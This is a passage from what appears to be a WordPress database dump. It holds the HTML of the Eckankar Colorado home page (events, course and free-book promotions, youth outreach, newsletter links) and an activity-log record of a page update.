col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236948,40273,'_message_key','post_updated'),(236949,40273,'_user_id','2'),(236950,40273,'_user_login','S8zhaBda'),(236951,40273,'_user_email','nada@zipnadanot.org'),(236952,40273,'_server_remote_addr','76.130.120.x'),(236953,40273,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236954,40274,'post_id','7160'),(236955,40274,'post_type','page'),(236956,40274,'post_title','Home'),(236957,40274,'post_prev_post_content','<div>\r\n<code><?xml version=\"1.0\" standalone=\"no\"?>\r\n<svg xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"wave\" style=\"transform:rotate(0deg); transition: 0.3s; margin-top: -80px;\" viewBox=\"0 0 1440 100\" version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\"><defs><linearGradient id=\"sw-gradient-0\" x1=\"0\" x2=\"0\" y1=\"1\" y2=\"0\"><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"0%\"/><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"100%\"/></linearGradient></defs><path style=\"transform:translate(0, 0px); opacity:1\" fill=\"url(#sw-gradient-0)\" d=\"M0,10L60,18.3C120,27,240,43,360,41.7C480,40,600,20,720,10C840,0,960,0,1080,5C1200,10,1320,20,1440,23.3C1560,27,1680,23,1800,20C1920,17,2040,13,2160,15C2280,17,2400,23,2520,23.3C2640,23,2760,17,2880,11.7C3000,7,3120,3,3240,6.7C3360,10,3480,20,3600,28.3C3720,37,3840,43,3960,50C4080,57,4200,63,4320,56.7C4440,50,4560,30,4680,26.7C4800,23,4920,37,5040,41.7C5160,47,5280,43,5400,48.3C5520,53,5640,67,5760,75C5880,83,6000,87,6120,80C6240,73,6360,57,6480,41.7C6600,27,6720,13,6840,15C6960,17,7080,33,7200,33.3C7320,33,7440,17,7560,10C7680,3,7800,7,7920,10C8040,13,8160,17,8280,21.7C8400,27,8520,33,8580,36.7L8640,40L8640,100L8580,100C8520,100,8400,100,8280,100C8160,100,8040,100,7920,100C7800,100,7680,100,7560,100C7440,100,7320,100,7200,100C7080,100,6960,100,6840,100C6720,100,6600,100,6480,100C6360,100,6240,100,6120,100C6000,100,5880,100,5760,100C5640,100,5520,100,5400,100C5280,100,5160,100,5040,100C4920,100,4800,100,4680,100C4560,100,4440,100,4320,100C4200,100,4080,100,3960,100C3840,100,3720,100,3600,100C3480,100,3360,100,3240,100C3120,100,3000,100,2880,100C2760,100,2640,100,2520,100C2400,100,2280,100,2160,100C2040,100,1920,100,1800,100C1680,100,1560,100,1440,100C1320,100,1200,100,1080,100C960,100,840,100,720,100C600,100,480,100,360,100C240,100,120,100,60,100L0,100Z\"/></svg></code>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div 